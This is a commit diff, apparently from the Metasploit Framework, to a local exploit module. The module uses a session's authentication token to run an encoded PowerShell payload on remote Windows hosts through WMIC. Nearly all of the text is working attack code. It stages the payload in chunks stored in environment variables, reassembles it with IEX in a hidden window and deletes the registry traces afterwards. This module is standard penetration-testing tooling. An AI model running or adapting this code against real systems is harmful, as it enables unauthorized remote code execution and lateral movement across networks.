If extapi dont stage payload
Meatballs
parent
186d8bd359
commit
c14ba11e79
|
|
@ -27,9 +27,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
the session's current authentication token instead of having to know
|
||||
a password or hash.
|
||||
|
||||
We do not get feedback from the WMIC command so there are no
|
||||
indicators of success or failure. The remote host must be configured
|
||||
to allow remote Windows Management Instrumentation.
|
||||
The remote host must be configured to allow remote Windows Management
|
||||
Instrumentation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
|
|
@ -76,42 +75,50 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def run_host(server)
|
||||
if load_extapi
|
||||
psh_options = { :remove_comspec => true,
|
||||
:encode_final_payload => true }
|
||||
else
|
||||
psh_options = { :remove_comspec => true,
|
||||
:encode_inner_payload => true,
|
||||
:use_single_quotes => true }
|
||||
end
|
||||
# Get the PSH Payload and split it into bitesize chunks
|
||||
# 1024 appears to be the max value allowed in env vars
|
||||
psh = cmd_psh_payload(payload.encoded,
|
||||
payload_instance.arch.first,
|
||||
{
|
||||
:remove_comspec => true,
|
||||
:encode_inner_payload => true,
|
||||
:use_single_quotes => true
|
||||
})
|
||||
chunks = split_code(psh, 1000)
|
||||
psh_options)
|
||||
|
||||
begin
|
||||
print_status("[#{server}] Storing payload in environment variables")
|
||||
env_name = rand_text_alpha(rand(3)+3)
|
||||
env_vars = []
|
||||
0.upto(chunks.length-1) do |i|
|
||||
env_vars << "#{env_name}#{i}"
|
||||
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
||||
result = wmic_command(c, server)
|
||||
if load_extapi
|
||||
exec_cmd = psh
|
||||
else
|
||||
print_status("[#{server}] Storing payload in environment variables")
|
||||
chunks = split_code(psh, 1000)
|
||||
env_name = rand_text_alpha(rand(3)+3)
|
||||
env_vars = []
|
||||
0.upto(chunks.length-1) do |i|
|
||||
env_vars << "#{env_name}#{i}"
|
||||
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
||||
result = wmic_command(c, server)
|
||||
|
||||
unless result
|
||||
print_error("[#{server}] WMIC command error - skipping host")
|
||||
return false
|
||||
unless result
|
||||
print_error("[#{server}] WMIC command error - skipping host")
|
||||
return false
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
x = rand_text_alpha(rand(3)+3)
|
||||
exec_cmd = generate_psh_command_line({
|
||||
:noprofile => true,
|
||||
:windowstyle => 'hidden',
|
||||
:command => "$#{x}=''"
|
||||
})
|
||||
env_vars.each do |env|
|
||||
exec_cmd << "+$env:#{env}"
|
||||
x = rand_text_alpha(rand(3)+3)
|
||||
exec_cmd = generate_psh_command_line({
|
||||
:noprofile => true,
|
||||
:windowstyle => 'hidden',
|
||||
:command => "$#{x}=''"
|
||||
})
|
||||
env_vars.each do |env|
|
||||
exec_cmd << "+$env:#{env}"
|
||||
end
|
||||
exec_cmd << ";IEX $#{x};"
|
||||
end
|
||||
exec_cmd << ";IEX $#{x};"
|
||||
|
||||
print_status("[#{server}] Executing payload")
|
||||
result = wmic_command(exec_cmd, server)
|
||||
|
|
@ -126,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_error("[#{server}] failed...)")
|
||||
end
|
||||
|
||||
print_status("[#{server}] Cleaning up environment variables")
|
||||
env_vars.each do |env|
|
||||
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
||||
wmic_command(cleanup_cmd, server)
|
||||
unless load_extapi
|
||||
print_status("[#{server}] Cleaning up environment variables")
|
||||
env_vars.each do |env|
|
||||
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
||||
wmic_command(cleanup_cmd, server)
|
||||
end
|
||||
end
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error("[#{server}] Error moving on... #{e}")
|
||||
|
|
|
|||
Loading…
Reference in New Issue